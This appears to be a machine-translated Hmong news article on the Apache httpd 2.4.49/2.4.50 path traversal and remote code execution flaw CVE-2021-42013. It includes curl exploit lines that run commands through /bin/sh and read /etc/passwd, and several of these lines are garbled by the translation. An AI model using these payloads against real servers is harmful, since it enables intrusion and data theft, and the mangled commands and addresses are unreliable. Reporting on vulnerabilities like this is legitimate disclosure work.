Ib qho kev tawm tsam tshiab tau pom muaj rau Apache http server, uas tseem tsis raug kho hauv kev hloov tshiab 2.4.50 thiab tso cai rau kev nkag mus rau cov ntaub ntawv los ntawm thaj chaw sab nraum lub vev xaib cov npe hauv paus. Tsis tas li ntawd, cov kws tshawb fawb tau pom ib txoj hauv kev uas tso cai rau, nyob rau hauv muaj qee qhov kev teeb tsa uas tsis yog tus qauv, tsis yog tsuas yog nyeem cov ntaub ntawv kaw lus, tab sis kuj tseem ua rau lawv cov cai nyob deb ntawm lub server. Qhov teeb meem tsuas yog tshwm sim hauv kev tso tawm 2.4.49 thiab 2.4.50; cov ntawv ua ntej tsis cuam tshuam. Txhawm rau tshem tawm qhov tsis txaus ntseeg tshiab, Apache httpd 2.4.51 tau tso tawm sai sai.
Ntawm nws qhov tseem ceeb, qhov teeb meem tshiab (CVE-2021-42013) zoo ib yam li qhov tsis muaj zog qub (CVE-2021-41773) hauv 2.4.49, qhov sib txawv tsuas yog qhov sib txawv ntawm qhov ".." cov cim. Tshwj xeeb, hauv kev tso tawm 2.4.50 lub peev xwm los siv cov kab ke "% 2e" los encode ib lub ntsiab lus raug thaiv, tab sis qhov ua tau ntawm ob chav encoding tau ploj lawm - thaum qhia qhov ua ntu zus "%% 32% 65", tus neeg rau zaub mov decoded nws mus rau "% 2e" thiab tom qab ntawd mus rau " .", i.e. cov "../" cov cim mus rau yav dhau los directory yuav raug encoded li ".%%32%65/".
Raws li kev siv qhov tsis zoo los ntawm kev ua tiav cov lej, qhov no yog ua tau thaum mod_cgi tau qhib thiab siv txoj hauv kev uas tso cai rau kev ua tiav ntawm CGI scripts (piv txwv li, yog tias ScriptAlias cov lus qhia tau qhib lossis ExecCGI chij tau teev nyob rau hauv Cov lus qhia kev xaiv). Ib qho yuav tsum tau ua kom muaj kev tawm tsam tau zoo kuj yog txhawm rau muab kev nkag mus rau cov npe nrog cov ntaub ntawv ua tiav, xws li /bin, lossis nkag mus rau cov ntaub ntawv hauv paus "/" hauv Apache chaw. Txij li thaum xws li kev nkag mus tsis yog feem ntau tso cai, kev ua txhaum cai tawm tsam muaj tsawg daim ntawv thov rau cov tshuab tiag tiag.
Nyob rau tib lub sijhawm, kev tawm tsam kom tau txais cov ntsiab lus ntawm cov ntaub ntawv tsis raug cai thiab cov ntawv sau ntawm lub vev xaib, nyeem tau los ntawm tus neeg siv hauv qab uas http server tab tom khiav, tseem cuam tshuam. Txhawm rau ua qhov kev tawm tsam zoo li no, nws txaus kom muaj cov npe ntawm lub xaib teeb tsa siv "Alias" lossis "ScriptAlias" cov lus qhia (DocumentRoot tsis txaus), xws li "cgi-bin".
Ib qho piv txwv ntawm kev siv dag zog uas tso cai rau koj los ua qhov "id" kev siv hluav taws xob ntawm lub server: curl 'http://192.168.0.1/cgi-bin/.%%%32%65/.%%32%65/.%% 32% 65/.%% 32% 65/.%% 32% 65/bin/sh' —data 'echo Content-Type: text/plain; ncha; id' uid=1(daemon) gid=1(daemon) pawg=1(daemon)
Ib qho piv txwv ntawm kev siv dag zog uas tso cai rau koj los tso saib cov ntsiab lus ntawm /etc/passwd thiab ib qho ntawm lub vev xaib scripts (kom tso tawm cov ntawv sau, cov ntawv teev npe tau txhais los ntawm "Alias" cov lus qhia, rau cov ntawv ua tiav tsis tau qhib, yuav tsum tau teev tseg. raws li lub hauv paus directory): curl 'http://192.168.0.1 .32/cgi-bin/.%%%65%32/.%%65%32/.%%65%32/.%%65%32/.% %65%192.168.0.1/etc/passwd' curl 'http://32/aliaseddir/.%%65%32/.%%65%32/.%%65%32/.%%65%32/. %% 65% 2/usr/local/apacheXNUMX/cgi -bin/test.cgi'
Qhov teeb meem feem ntau cuam tshuam tsis tu ncua kev faib tawm tshiab xws li Fedora, Arch Linux thiab Gentoo, nrog rau cov chaw nres nkoj ntawm FreeBSD. Cov pob khoom nyob rau hauv cov ceg ruaj khov ntawm cov neeg saib xyuas kev faib tawm Debian, RHEL, Ubuntu thiab SUSE tsis cuam tshuam los ntawm qhov tsis zoo. Qhov teeb meem tsis tshwm sim yog tias nkag mus rau cov ntawv qhia meej meej tsis pom zoo siv qhov "xav tau txhua qhov tsis pom zoo" teeb tsa.
Tau qhov twg los: opennet.ru